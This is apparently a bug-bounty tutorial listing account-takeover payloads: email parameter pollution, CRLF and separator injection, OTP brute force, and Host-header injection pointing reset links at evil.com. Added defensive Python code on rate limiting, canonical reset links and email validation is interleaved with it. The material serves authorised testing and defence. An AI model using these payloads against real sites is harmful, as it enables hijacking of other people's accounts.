Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In today’s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. In this article, we’re going to dive deep into a variety of techniques that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of “Email Replacing” during the account registration process.
We’ll also explore techniques like “Parameter Pollution” in reset password functionalities, “OTP Code Bruteforce,” “Host Header Injection,” and even the clever use of separators within parameter values, among other tactics.
Throughout this guide, we’ll provide you with real-world examples and break down the mechanics behind each technique. Our goal is to arm you with the knowledge and insights necessary to not only identify and understand these vulnerabilities, but also to ethically report them and contribute to a safer digital ecosystem.
So, whether you’re someone looking to explore the exciting world of ethical hacking or a dedicated security enthusiast, keep reading to elevate your bug bounty skills and play a vital role in ensuring online security.
1. Account Takeover Through Email Replacing When Registering an Account (testing/abusing the email filter)
Example:
[email protected],[email protected]
email@email","[email protected]
[email protected]:[email protected]
[email protected]%0d%0a[email protected]
%0d%0a[email protected]
%0a[email protected]
[email protected]%0d%0a
[email protected]%0a
[email protected]%0d
[email protected]%00
[email protected]{{}}
Example Request:
name=HACKER&email=[email protected]&email=[email protected]&username=hackerz&password=THIS_ISPASSWORD_TO_TAKEOVER&password-confirmation=THIS_ISPASSWORD_TO_TAKEOVER&_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX
2. Account Takeover Through Parameter Pollution in Reset Password
Example:
POST /passwordReset
[…]
[email protected]&[email protected]
or in JSON:
{"email":["[email protected]","[email protected]"]}
3. Account Takeover Through OTP Code Bruteforce
Example:
POST /reset
[…]
[email protected]&code=$12345$
You can use Burp Intruder.
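The defence against section 3 is to make the code space unreachable within the attempt budget: a short-lived code, a small per-account attempt counter that invalidates the code once exhausted, and a constant-time comparison. The following is an added example (not code from the original post): an in-memory store, with a clock injected so expiry can be tested, standing in for whatever database or cache a real application would use; the constants and the `OtpStore` name are this example's own.

```python
import hmac
import secrets
import time

OTP_LENGTH = 6            # digits in the code (example value)
MAX_ATTEMPTS = 5          # wrong guesses allowed before the code is discarded
OTP_TTL_SECONDS = 600     # code lifetime: 10 minutes (example value)


class OtpStore:
    """Per-account one-time codes with attempt counting.

    Constructed stand-in for a database or cache; `now` is injectable so the
    expiry path can be exercised without waiting.
    """

    def __init__(self, now=time.time):
        self._now = now
        self._codes = {}  # email -> {"code", "expires", "attempts"}

    def issue(self, email: str) -> str:
        """Generate a fresh code for the account, replacing any older one."""
        code = f"{secrets.randbelow(10 ** OTP_LENGTH):0{OTP_LENGTH}d}"
        self._codes[email] = {
            "code": code,
            "expires": self._now() + OTP_TTL_SECONDS,
            "attempts": 0,
        }
        return code

    def verify(self, email: str, submitted: str) -> bool:
        """Return True only for the current, unexpired, unlocked code.

        Every wrong guess counts; once MAX_ATTEMPTS is reached the code is
        dropped, so an Intruder-style sweep of all 10**OTP_LENGTH values
        can never reach the right one without a new code being issued.
        """
        entry = self._codes.get(email)
        if entry is None:
            return False
        if self._now() > entry["expires"] or entry["attempts"] >= MAX_ATTEMPTS:
            self._codes.pop(email, None)  # expired or locked: force a fresh code
            return False
        entry["attempts"] += 1
        # Constant-time comparison avoids leaking matching prefixes via timing.
        ok = hmac.compare_digest(entry["code"].encode(), submitted.encode())
        if ok:
            self._codes.pop(email, None)  # single use
        return ok


if __name__ == "__main__":
    store = OtpStore()
    code = store.issue("victim@example.com")  # constructed address
    print("wrong guess accepted?", store.verify("victim@example.com", "000000"))
    print("right code accepted?", store.verify("victim@example.com", code))
```

A production deployment would also rate-limit `/reset` per source address and per account, since an attacker who can request unlimited fresh codes gets MAX_ATTEMPTS guesses per code.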
4. Account Takeover Through Host Header Injection
Example:
POST /reset
Host: evilsite.com
[…]
[email protected]
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[…]
[email protected]
The victim then receives a reset email whose link is built from the injected host, so the link (and the “token” embedded in it) points at evilsite.com. When the user clicks the link, the token is logged on the evilsite.com server.
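The root cause in section 4 is building the reset link from request headers. The following added example (not code from the original post) composes the link from a configured canonical origin instead, rejects requests whose Host header does not match it, and never consults X-Forwarded-Host at all. `CANONICAL_ORIGIN`, the `build_reset_link` and `safe_reset_link` names, and the `target.example` host are this example's own assumptions.

```python
from urllib.parse import urlencode, urlsplit

# The origin used in outgoing links comes from configuration, never from the
# request. Constructed example value.
CANONICAL_ORIGIN = "https://target.example"


def _header(headers: dict, name: str):
    """Case-insensitive header lookup over a plain dict of request headers."""
    wanted = name.lower()
    for key, value in headers.items():
        if key.lower() == wanted:
            return value
    return None


def build_reset_link(token: str, headers: dict) -> str:
    """Return the password-reset URL for `token`.

    The Host header must match the configured origin (the same idea as an
    allowed-hosts list); X-Forwarded-Host is deliberately ignored, because the
    link is derived from CANONICAL_ORIGIN, not from anything the client sent.
    """
    expected_host = urlsplit(CANONICAL_ORIGIN).netloc.lower()
    host = _header(headers, "Host")
    if host is None or host.lower() != expected_host:
        raise ValueError(f"unexpected Host header: {host!r}")
    return f"{CANONICAL_ORIGIN}/reset?{urlencode({'token': token})}"


def safe_reset_link(token: str, headers: dict):
    """Convenience wrapper: the link, or None when the request is rejected."""
    try:
        return build_reset_link(token, headers)
    except ValueError:
        return None


if __name__ == "__main__":
    # Constructed headers mirroring the two requests shown above.
    print(safe_reset_link("tok123", {"Host": "evilsite.com"}))
    print(safe_reset_link("tok123", {"Host": "target.example",
                                     "X-Forwarded-Host": "evil.com"}))
```

Detection on the server side is straightforward once links are built this way: a rejected Host value on the reset endpoint is worth logging, since legitimate clients never send one.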
5. Account Takeover Through Using Separator in Value of the Parameter
Example:
POST /PWreset
[…]
[email protected],[email protected]
POST /PWreset
[…]
[email protected]%20[email protected]
POST /PWreset
[…]
[email protected]|[email protected]
POST /PWreset
[…]
[email protected]%00[email protected]
6. Try Entering No Domain in the Parameter Value for Account Takeover
Example:
POST /registeraccount
[…]
email=victimemail
7. Try Entering an Email Value With No TLD in the Parameter
Example:
POST /reset
[…]
[email protected]
POST /reset
[…]
[email protected]%0a%0dcc:[email protected]
8. Try Re-Sign up using Same Email
Example:
POST /newaccount
[…]
[email protected]&password=1234
After signing up with the victim’s email, try signing up again with a different password:
POST /newaccount
[…]
[email protected]&password=yourehacked
9. If the Request Carries JSON Data, Add a Comma and Insert Your Hacker Email
Example:
POST /newaccount
[…]
{"email":"[email protected]","[email protected]","token":"xxxxxxxxxx"}
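Sections 1, 2, 5, 6, 7, 8 and 9 all exploit the same gap: the server accepts an email value that is not exactly one well-formed address, or it lets a second sign-up overwrite an existing account. The following added example (not code from the original post) shows the server-side checks that close all of them at once. It assumes plain form-encoded or JSON bodies; the `EmailError`, `single_value`, `validate_email`, `email_from_request`, `safe_email` and `register` names, the regular expression and the in-memory account store are this example's own.

```python
import json
import re
from urllib.parse import parse_qs

# Deliberately conservative address syntax: one local part, one '@', a dotted
# domain whose last label (the TLD) is alphabetic. Whitespace, control bytes,
# quotes, commas, colons, pipes and braces are all rejected by this pattern.
EMAIL_RE = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$"
)


class EmailError(ValueError):
    """The request does not carry exactly one well-formed address."""


def single_value(body: str, content_type: str, name: str = "email") -> str:
    """Return the one value of `name`, rejecting repeated form keys and JSON
    arrays (the parameter pollution of sections 2 and 9)."""
    if content_type.startswith("application/json"):
        data = json.loads(body)
        value = data.get(name) if isinstance(data, dict) else None
        if not isinstance(value, str):
            raise EmailError(f"{name} must be a single JSON string")
        return value
    values = parse_qs(body, keep_blank_values=True).get(name, [])
    if len(values) != 1:
        raise EmailError(f"expected exactly one {name} parameter, got {len(values)}")
    return values[0]


def validate_email(raw: str) -> str:
    """Reject CR/LF/NUL and separator tricks (sections 1 and 5), a missing
    domain (6) and a missing TLD (7); return the canonical lower-cased address."""
    if len(raw) > 254 or any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw):
        raise EmailError("control character or over-long value")
    if raw.count("@") != 1:
        raise EmailError("address must contain exactly one '@'")
    if not EMAIL_RE.fullmatch(raw):
        raise EmailError("address is not well-formed")
    return raw.lower()


def email_from_request(body: str, content_type: str, name: str = "email") -> str:
    """Extract and validate the single address a request is allowed to carry."""
    return validate_email(single_value(body, content_type, name))


def safe_email(body: str, content_type: str, name: str = "email"):
    """Convenience wrapper: the address, or None when the request is rejected."""
    try:
        return email_from_request(body, content_type, name)
    except (EmailError, ValueError):
        return None


def register(store: dict, email: str, password: str) -> bool:
    """Create the account only if the address is unused (section 8): a second
    sign-up with the same address must never replace the stored credential."""
    if email in store:
        return False
    store[email] = password  # stand-in for a proper password hash
    return True


if __name__ == "__main__":
    FORM = "application/x-www-form-urlencoded"
    # Constructed bodies shaped like the payloads in sections 1, 2, 5, 6 and 7.
    for body in ("email=alice%40example.com&username=alice",
                 "email=a%40example.com&email=b%40example.com",
                 "email=a%40example.com%0d%0ab%40example.com",
                 "email=a%40example.com%2Cb%40example.com",
                 "email=victimemail",
                 "email=a%40example"):
        print(body, "->", safe_email(body, FORM))
```

Two details matter in practice: `parse_qs` URL-decodes before the checks run, so `%0d%0a` and `%00` arrive as real control characters and are caught by the first test in `validate_email` rather than slipping past a pattern match on the encoded form; and the uniqueness check in `register` must be enforced by the database (a unique index on the normalised address) as well, since two concurrent sign-ups can both pass the in-memory lookup.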
CLOSING
We acquired these account takeover tricks from various sources, one of them being daffainfo. Among these multiple tricks, there are a few that I have personally attempted and successfully executed. I’m optimistic that you’ll achieve success with them as well, someday. Pinterest: account takeover tips
-SECRY